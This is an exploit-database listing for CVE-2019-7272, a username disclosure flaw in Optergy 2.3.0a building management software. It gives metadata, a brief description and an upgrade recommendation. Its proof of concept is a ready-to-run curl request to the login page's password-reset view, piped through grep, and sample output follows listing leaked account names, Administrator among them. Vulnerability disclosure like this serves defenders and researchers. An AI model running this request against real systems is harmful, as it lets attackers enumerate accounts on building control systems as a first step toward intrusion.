header-logo
Suggest Exploit
vendor:
Optergy
by:
LiquidWorm
5.3
CVSS
MEDIUM
Username Disclosure
200
CWE
Product Name: Optergy
Affected Version From: <=2.3.0a
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2019-7272
CPE: a:optergy:optergy:2.3.0a
Metasploit:
Other Scripts:
Platforms Tested:
2019

Optergy 2.3.0a – Username Disclosure

The Optergy 2.3.0a version of the product allows an attacker to disclose the usernames of the system. By sending a specially crafted request to the Login.html page, the attacker can retrieve a list of usernames.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to version 2.3.0b or later to mitigate the risk.
Source

Exploit-DB raw data:

# Title: Optergy 2.3.0a - Username Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7272

# PoC:

curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>

Navigation

Suggest Exploit

Services By CQR